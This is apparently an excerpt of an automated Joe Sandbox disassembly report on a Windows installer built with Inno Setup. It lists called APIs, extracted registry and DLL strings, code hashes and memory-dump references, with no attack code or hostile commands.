                                                                                    Similarity
                                                                                    • API ID: ErrorFileFindFirstLast
                                                                                    • String ID:
                                                                                    • API String ID: 873889042-0
                                                                                    • Opcode ID: 53d0b0f71413149149492da54f6d795d092e0f5f146a7a05654b1b551a70fbd2
                                                                                    • Instruction ID: f9611aeb3029889b76a7ade8829495a9d918b249c8fbd3e45bbd36cd3e6629b4
                                                                                    • Opcode Fuzzy Hash: 53d0b0f71413149149492da54f6d795d092e0f5f146a7a05654b1b551a70fbd2
                                                                                    • Instruction Fuzzy Hash: 1DF04931A04604AB8B10DB6AAD0149FB7FCDB46725710467BFC14E3282EA784E088598
                                                                                    APIs
                                                                                    • GetVersion.KERNEL32(?,0046D1AE), ref: 0046D122
                                                                                    • CoCreateInstance.OLE32(00498B64,00000000,00000001,00498B74,?,?,0046D1AE), ref: 0046D13E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateInstanceVersion
                                                                                    • String ID:
                                                                                    • API String ID: 1462612201-0
                                                                                    • Opcode ID: 7e99c10d7870a2a4e40b689fd77bd4c1fbc398cb1ecae8ca6f7261d0d29e43fa
                                                                                    • Instruction ID: 1e059e1ff20256b2d38cad76cdb56475a0db9ba99d2cbde6061077ac095a0934
                                                                                    • Opcode Fuzzy Hash: 7e99c10d7870a2a4e40b689fd77bd4c1fbc398cb1ecae8ca6f7261d0d29e43fa
                                                                                    • Instruction Fuzzy Hash: 56F0A7B0B40301DEEB10AB2ADD46B8B37C19713324F04413BB054962A0E7ED8880CB9F
                                                                                    APIs
                                                                                    • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoLocale
                                                                                    • String ID:
                                                                                    • API String ID: 2299586839-0
                                                                                    • Opcode ID: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
                                                                                    • Instruction ID: d3b8e551ebd18b966166ca098383beb9494d3946d3c482517005b7019d2e894c
                                                                                    • Opcode Fuzzy Hash: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
                                                                                    • Instruction Fuzzy Hash: EEE0D87170021467D711A95A9C869F7B35CA758314F00427FB949EB3C2EDB8DE8046ED
                                                                                    APIs
                                                                                    • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424161,?,00000000,0042416C), ref: 00423BBE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: NtdllProc_Window
                                                                                    • String ID:
                                                                                    • API String ID: 4255912815-0
                                                                                    • Opcode ID: b8a7fb1636f510e04679fc1c95d6034bf50f85873c956373ae04f9643015f65e
                                                                                    • Instruction ID: 62037174fb3a4e63d39f4d80a9d1e591ad15120c94b51c82d4663250cb3dbf53
                                                                                    • Opcode Fuzzy Hash: b8a7fb1636f510e04679fc1c95d6034bf50f85873c956373ae04f9643015f65e
                                                                                    • Instruction Fuzzy Hash: A0F0C579205608AFCB40DF9DC588D4AFBE8FB4C260B158295B988CB321C234FE808F94
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: NameUser
                                                                                    • String ID:
                                                                                    • API String ID: 2645101109-0
                                                                                    • Opcode ID: b308eefd78fc34ccedab6b1389f53df2d3f8bc27a278cf7cb0c73ee59b873f37
                                                                                    • Instruction ID: 76809c6cbed83fd478a986dc42ef3113a42af1b7be0c57f55a4460954ad8dcd3
                                                                                    • Opcode Fuzzy Hash: b308eefd78fc34ccedab6b1389f53df2d3f8bc27a278cf7cb0c73ee59b873f37
                                                                                    • Instruction Fuzzy Hash: 54D0CD7534430063C7006AA99C82597358C4784305F00443F7CC5DA2C3E5BDDA88565A
                                                                                    APIs
                                                                                    • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F3B0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: NtdllProc_Window
                                                                                    • String ID:
                                                                                    • API String ID: 4255912815-0
                                                                                    • Opcode ID: 463407ea8ab64360e41f6c039c0e682b96e3ddf2f94f44b918dd9fba9020941f
                                                                                    • Instruction ID: f6c568c4939315a2eda578795105166964a56c952c5b5facb2271ccc97efa3bd
                                                                                    • Opcode Fuzzy Hash: 463407ea8ab64360e41f6c039c0e682b96e3ddf2f94f44b918dd9fba9020941f
                                                                                    • Instruction Fuzzy Hash: B8D05E7221010D6B8B00DE99D840C6F33AC9B88700BA08825F948C7205C634EC108BA4

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph: rendered graph of the function starting at 46e080 (node and edge list omitted)
                                                                                    APIs
                                                                                      • Part of subcall function 0046DE6C: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,00474FCB,0049B178,?,0046E183,?,00000000,0046E6DA,?,_is1), ref: 0046DE8F
                                                                                    • RegCloseKey.ADVAPI32(?,0046E6E1,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046E72C,?,?,0049B178,00000000), ref: 0046E6D4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseValue
                                                                                    • String ID: " /SILENT$5.4.0 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                                    • API String ID: 3132538880-1122008755
                                                                                    • Opcode ID: 8e42fddb56d3329dbef7a6a297206f9074c7af5ead7140c5731b4336ecc3ba8d
                                                                                    • Instruction ID: d6e88d1f6cb7b2cefc9fba2fbd39931f8be9331f85677ee55fb68547bd3bf3cf
                                                                                    • Opcode Fuzzy Hash: 8e42fddb56d3329dbef7a6a297206f9074c7af5ead7140c5731b4336ecc3ba8d
                                                                                    • Instruction Fuzzy Hash: C3123034F001089BCB04EB56E981ADE77F5EF58304F60807BE8116B3A5EB79AD45CB5A

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph: rendered graph of the function starting at 490c98 (node and edge list omitted)
                                                                                    APIs
                                                                                    • Sleep.KERNEL32(00000000,00000000,0049118D,?,?,?,?,00000000,00000000,00000000), ref: 00490CD8
                                                                                    • FindWindowA.USER32(00000000,00000000), ref: 00490D09
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: FindSleepWindow
                                                                                    • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                                    • API String ID: 3078808852-3310373309
                                                                                    • Opcode ID: 4688106ba75806e635d0f748856e326098f1ac44329b3e50716d9597bb099cff
                                                                                    • Instruction ID: 3689c34fe079b887eecbe3c8abd258a9be24a9666ebde3bfb919725182042c62
                                                                                    • Opcode Fuzzy Hash: 4688106ba75806e635d0f748856e326098f1ac44329b3e50716d9597bb099cff
                                                                                    • Instruction Fuzzy Hash: 8EC19C60B002026BDB14BB3E8C8291E599A9FC9708B11D93FF546EB79ACD3DDD06435E

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph: rendered graph of the function starting at 481df0 (node and edge list omitted)
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00481E01
                                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00481E0E
                                                                                    • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00481E1C
                                                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00481E24
                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00481E30
                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00481E51
                                                                                    • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00481E64
                                                                                    • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00481E6A
                                                                                    • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00481E81
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                                    • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                                    • API String ID: 2230631259-2623177817
                                                                                    • Opcode ID: ee5804469110e506db367347f51c824ce5616b51277ad345f7f2ea83579cd2a3
                                                                                    • Instruction ID: 139b281cd70ff203116dc437a84a2e67e00dfa051846aebc7d59a7e7d95df608
                                                                                    • Opcode Fuzzy Hash: ee5804469110e506db367347f51c824ce5616b51277ad345f7f2ea83579cd2a3
                                                                                    • Instruction Fuzzy Hash: B1110D41504341D4DB2077BA6C45B7F2A8C8B11319F080C3B6C50662F3CA7C8887DBAF

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph: rendered graph of the function starting at 472708 (node and edge list omitted)
1678->1686 1687 4729c9-4729d0 1678->1687 1679->1678 1680->1652 1690 4728f5-4728f9 1682->1690 1691 47291a-472921 1682->1691 1695 4729d2-4729e6 call 403738 call 42dc8c 1687->1695 1696 4729ec-4729f9 1687->1696 1690->1660 1692 4728ff-472918 call 47255c 1690->1692 1691->1660 1693 472923-472934 call 46dd50 1691->1693 1692->1660 1693->1660 1695->1686 1695->1696 1696->1686 1698 4729ff 1696->1698 1697->1660 1702 47296a-472971 1697->1702 1698->1686 1703 472c26-472c41 call 47ad88 call 430acc 1698->1703 1704 472bc4-472bfd call 47ad88 call 406da0 call 403738 RegSetValueExA 1698->1704 1705 472a22-472a2c 1698->1705 1706 472c8b-472cbd call 403574 call 403738 * 2 RegSetValueExA 1698->1706 1702->1660 1710 472973-472984 call 46dd50 1702->1710 1737 472c43-472c48 call 4529a4 1703->1737 1738 472c4d-472c6d call 403738 RegSetValueExA 1703->1738 1704->1686 1756 472c03-472c0a 1704->1756 1712 472a35-472a3a 1705->1712 1713 472a2e-472a31 1705->1713 1706->1686 1752 472cbf-472cc6 1706->1752 1710->1660 1722 472a41-472a43 1712->1722 1719 472a33 1713->1719 1720 472a3c 1713->1720 1719->1722 1720->1722 1728 472ae0-472af2 call 40385c 1722->1728 1729 472a49-472a5b call 40385c 1722->1729 1747 472af4-472b0b call 403738 call 42dc80 1728->1747 1748 472b0d-472b10 call 403400 1728->1748 1744 472a76-472a79 call 403400 1729->1744 1745 472a5d-472a74 call 403738 call 42dc74 1729->1745 1737->1738 1738->1686 1763 472c6f-472c76 1738->1763 1759 472a7e-472a85 1744->1759 1745->1744 1745->1759 1747->1748 1760 472b15-472b4e call 47ada8 1747->1760 1748->1760 1752->1686 1761 472cc8-472cd4 call 46dd50 1752->1761 1756->1686 1758 472c10-472c21 call 46dd50 1756->1758 1758->1686 1766 472a87-472aa5 call 403738 RegQueryValueExA 1759->1766 1767 472ab6-472adb call 47ada8 1759->1767 1781 472b50-472b60 call 403574 1760->1781 1782 472b6f-472b9b call 403574 call 403738 * 2 RegSetValueExA 1760->1782 1761->1686 1763->1686 1771 472c78-472c89 call 46dd50 1763->1771 1766->1767 1784 472aa7-472aab 1766->1784 1767->1782 1771->1686 1781->1782 
1792 472b62-472b6a call 40357c 1781->1792 1782->1686 1797 472ba1-472ba8 1782->1797 1787 472ab3 1784->1787 1788 472aad-472ab1 1784->1788 1787->1767 1788->1767 1788->1787 1792->1782 1797->1686 1798 472bae-472bbf call 46dd50 1797->1798 1798->1686
                                                                                    APIs
                                                                                    • RegDeleteValueA.ADVAPI32(?,00000000,?,00000002,00000000,00000000,00472D01,?,?,?,?,00000000,00472E5B,?,?,0049B178), ref: 00472890
                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,00000002,00000000,00000000,00472D01,?,?,?,?,00000000,00472E5B,?,?), ref: 00472899
                                                                                      • Part of subcall function 0047255C: GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725E9
                                                                                    • RegDeleteValueA.ADVAPI32(?,00000000,00000000,00472CF0,?,?,00000000,00472D01,?,?,?,?,00000000,00472E5B,?,?), ref: 004729B7
                                                                                      • Part of subcall function 0042DD0C: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38
                                                                                      • Part of subcall function 0047255C: GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725FF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: DeleteErrorLastValue$CloseCreate
                                                                                    • String ID: Cannot access 64-bit registry keys on this version of Windows$Failed to parse "qword" value$break$olddata${olddata}
                                                                                    • API String ID: 2638610037-3092547568
                                                                                    • Opcode ID: 60c61eb47bec3a2eac8f774f64e080f7387afc8de715dc427226ed339478b351
                                                                                    • Instruction ID: 0e42c6b5a9d89693cebc7f702fd10ac1157821fa568552e70b891395feb5272a
                                                                                    • Opcode Fuzzy Hash: 60c61eb47bec3a2eac8f774f64e080f7387afc8de715dc427226ed339478b351
                                                                                    • Instruction Fuzzy Hash: BE320D74E00248AFDB15DFA9D581BDEB7F4AF08304F448066F914AB3A2CB78AD45CB59

                                                                                    Control-flow Graph (legend: Executed / Not Executed)
                                                                                    APIs
                                                                                      • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                    • RegCloseKey.ADVAPI32(?,004686E2,?,?,00000001,00000000,00000000,004686FD,?,00000000,00000000,?), ref: 004686CB
                                                                                    Strings
                                                                                    • Inno Setup: Deselected Components, xrefs: 0046860C
                                                                                    • Inno Setup: User Info: Organization, xrefs: 0046869A
                                                                                    • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468527
                                                                                    • Inno Setup: Setup Type, xrefs: 004685DA
                                                                                    • Inno Setup: Deselected Tasks, xrefs: 00468659
                                                                                    • Inno Setup: Selected Components, xrefs: 004685EA
                                                                                    • Inno Setup: No Icons, xrefs: 004685B3
                                                                                    • %s\%s_is1, xrefs: 00468545
                                                                                    • Inno Setup: Icon Group, xrefs: 004685A6
                                                                                    • Inno Setup: User Info: Name, xrefs: 00468687
                                                                                    • Inno Setup: User Info: Serial, xrefs: 004686AD
                                                                                    • Inno Setup: App Path, xrefs: 0046858A
                                                                                    • Inno Setup: Selected Tasks, xrefs: 00468637
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseOpen
                                                                                    • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                    • API String ID: 47109696-1093091907
                                                                                    • Opcode ID: bf4e5bcefe0dd369e5494d4ffd3574234bc3bf336502117424754692d6e87e56
                                                                                    • Instruction ID: 9e5fcdcadd17e924e807c4804dd8b09e3b38f40da8ec3e6eb3bcc5aac06a0e07
                                                                                    • Opcode Fuzzy Hash: bf4e5bcefe0dd369e5494d4ffd3574234bc3bf336502117424754692d6e87e56
                                                                                    • Instruction Fuzzy Hash: 7751B570A002089BDB11DB65D9416DEB7F5EF49304FA086BEE840A7391EF78AE05CB5D

                                                                                    Control-flow Graph (legend: Executed / Not Executed)
                                                                                    APIs
                                                                                    • GetProcAddress.KERNEL32(74600000,SHGetFolderPathA), ref: 0047B9DE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc
                                                                                    • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$j]I$shell32.dll$shfolder.dll
                                                                                    • API String ID: 190572456-2632518235
                                                                                    • Opcode ID: 19c183ce3fa01bcadeab013b8c160553b935e57be8875c604a0db8c8468d0ef5
                                                                                    • Instruction ID: 54e288ff13d65e77707e80ace3ca021a5634fe8f765e4003a0d502320fe0c017
                                                                                    • Opcode Fuzzy Hash: 19c183ce3fa01bcadeab013b8c160553b935e57be8875c604a0db8c8468d0ef5
                                                                                    • Instruction Fuzzy Hash: 62311DB0A00249DFCB10EB95D982AEEB7B4EF44308F50847BE554E7352D7389E458BAD

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047B723,?,?,00000000,0049A628,00000000,00000000,?,004969FD,00000000,00496BA6,?,00000000), ref: 0047B643
                                                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,0047B723,?,?,00000000,0049A628,00000000,00000000,?,004969FD,00000000,00496BA6,?,00000000), ref: 0047B64C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                    • String ID: Created temporary directory: $REGDLL_EXE$\_RegDLL.tmp$\_setup64.tmp$_isetup$oI$oI
                                                                                    • API String ID: 1375471231-857235331
                                                                                    • Opcode ID: cbcd31ce72f07627676fb358a31cf6d42b3233dd890dda5219184df80f66688f
                                                                                    • Instruction ID: c69cc1ab8f896661f98e1b5ecb406916ff938ef434e98a02422d0df200dcf9d8
                                                                                    • Opcode Fuzzy Hash: cbcd31ce72f07627676fb358a31cf6d42b3233dd890dda5219184df80f66688f
                                                                                    • Instruction Fuzzy Hash: 45415C34A002099FCB04EFA5D992ADEB7B5EF48309F50843BE51477392DB389E058B99

                                                                                    Control-flow Graph (legend: Executed / Not Executed)
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,00497084), ref: 0040633A
                                                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
                                                                                    • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
                                                                                    • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
                                                                                    • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00497084), ref: 0040637E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
